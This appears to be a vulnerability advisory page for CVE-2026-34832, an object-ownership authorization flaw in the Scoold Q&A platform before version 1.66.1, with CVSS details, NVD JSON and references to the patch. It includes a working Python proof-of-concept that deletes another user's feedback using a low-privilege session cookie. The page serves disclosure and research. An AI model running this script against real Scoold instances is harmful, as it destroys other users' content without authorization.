Security Vulnerability Report
中文
CVE-2026-34832 CVSS 6.5 MEDIUM

CVE-2026-34832

Published: 2026-04-02 20:16:27
Last Modified: 2026-04-15 17:29:55

Description

Scoold is a Q&A and a knowledge sharing platform for teams. Prior to version 1.66.1, Scoold contains an authenticated authorization flaw in feedback deletion that allows any logged-in, low-privilege user to delete another user's feedback post by submitting its ID to POST /feedback/{id}/delete. The handler enforces authentication but does not enforce object ownership (or moderator/admin authorization) before deletion. In verification, a second non-privileged account successfully deleted a victim account's feedback item, and the item immediately disappeared from the feedback listing/detail views. This issue has been patched in version 1.66.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:erudika:scoold:*:*:*:*:*:*:*:* - VULNERABLE
Scoold < 1.66.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def delete_feedback(target_url, feedback_id, session_cookie): """ PoC for CVE-2026-34832: Authenticated Authorization Bypass in Scoold This script attempts to delete a feedback item using a low-privilege user session. """ headers = { "Cookie": f"JSESSIONID={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } # Construct the delete endpoint URL delete_url = f"{target_url}/feedback/{feedback_id}/delete" try: response = requests.post(delete_url, headers=headers) if response.status_code == 200: print(f"[+] Successfully deleted feedback ID: {feedback_id}") print(f"[+] Response: {response.text}") else: print(f"[-] Failed to delete feedback. Status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Example usage TARGET = "http://localhost:8080" # Replace with actual Scoold instance URL VICTIM_FEEDBACK_ID = "12345" # Replace with target feedback ID ATTACKER_SESSION = "attacker_session_cookie_value" # Replace with low-privilege session delete_feedback(TARGET, VICTIM_FEEDBACK_ID, ATTACKER_SESSION)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34832", "sourceIdentifier": "[email protected]", "published": "2026-04-02T20:16:27.040", "lastModified": "2026-04-15T17:29:54.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Scoold is a Q&A and a knowledge sharing platform for teams. Prior to version 1.66.1, Scoold contains an authenticated authorization flaw in feedback deletion that allows any logged-in, low-privilege user to delete another user's feedback post by submitting its ID to POST /feedback/{id}/delete. The handler enforces authentication but does not enforce object ownership (or moderator/admin authorization) before deletion. In verification, a second non-privileged account successfully deleted a victim account's feedback item, and the item immediately disappeared from the feedback listing/detail views. This issue has been patched in version 1.66.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:erudika:scoold:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.66.1", "matchCriteriaId": "52EC1B7D-984C-4F4B-AE33-0B3512EFC00D"}]}]}], "references": [{"url": "https://github.com/Erudika/scoold/commit/5def88c25405cc60482292bcceb45dc024e899fe", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Erudika/scoold/releases/tag/1.66.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Erudika/scoold/security/advisories/GHSA-g5fv-xw88-vw44", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}